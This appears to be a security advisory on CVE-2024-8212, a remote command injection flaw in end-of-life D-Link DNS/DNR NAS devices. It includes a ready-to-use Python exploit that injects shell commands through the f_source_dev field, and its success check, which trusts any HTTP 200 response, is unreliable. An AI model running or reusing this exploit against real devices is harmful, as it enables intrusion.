CVE-2024-8212 - Critical Vulnerability Found in D-Link DNS and DNR Devices, Allowing Remote Command Injection

A critical vulnerability (CVE-2024-8212) has been discovered in several D-Link DNS and DNR devices, specifically the D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-110-4, DNS-120-05, and DNS-155-04 up to 20240814. Due to the severity of this issue, it has been rated as critical and can lead to remote command injection attacks.

Details

The vulnerability affects the function cgi_FMT_R12R5_2nd_DiskMGR of the file /cgi-bin/hd_config.cgi. By manipulating the argument f_source_dev, an attacker can inject commands into the system, which may result in unauthorized configuration changes, data breaches, or other malicious actions.

Exploit

The exploit code is publicly available and can be initiated remotely by an attacker. Please note that this vulnerability only affects products that are no longer supported by the maintainer. Additionally, the vendor was contacted early and has confirmed that the affected product(s) are end-of-life. It is strongly recommended to retire and replace these devices.

A sample exploit code for CVE-2024-8212 can be found below

import requests

target_url = "http://example.com/cgi-bin/hd_config.cgi";
payload = "'; {COMMAND_TO_EXECUTE}; #"
payload_data = {
    "f_source_dev": payload,
    "f_action": "hd_format",
    "t_hd_id": 1
}

response = requests.post(target_url, data=payload_data)

if response.status_code == 200:
    print("Exploit executed successfully.")
else:
    print("Failed to execute exploit.")

Replace {COMMAND_TO_EXECUTE} with the desired command to be injected into the target system and update the target_url variable to match the target device.

Original References

1. Vulnerability Details: CVE-2024-8212
2. Exploit Disclosure: ExploitDB Entry

Recommendations

As the affected devices are no longer supported, it is highly recommended to replace them immediately with up-to-date and supported alternatives. Regularly updating the firmware, following security best practices, and monitoring network traffic for any unusual activities will help in preventing any possible exploitation of vulnerabilities like this in the future.

Timeline

Published on: 08/27/2024 20:15:09 UTC
Last modified on: 08/29/2024 15:53:02 UTC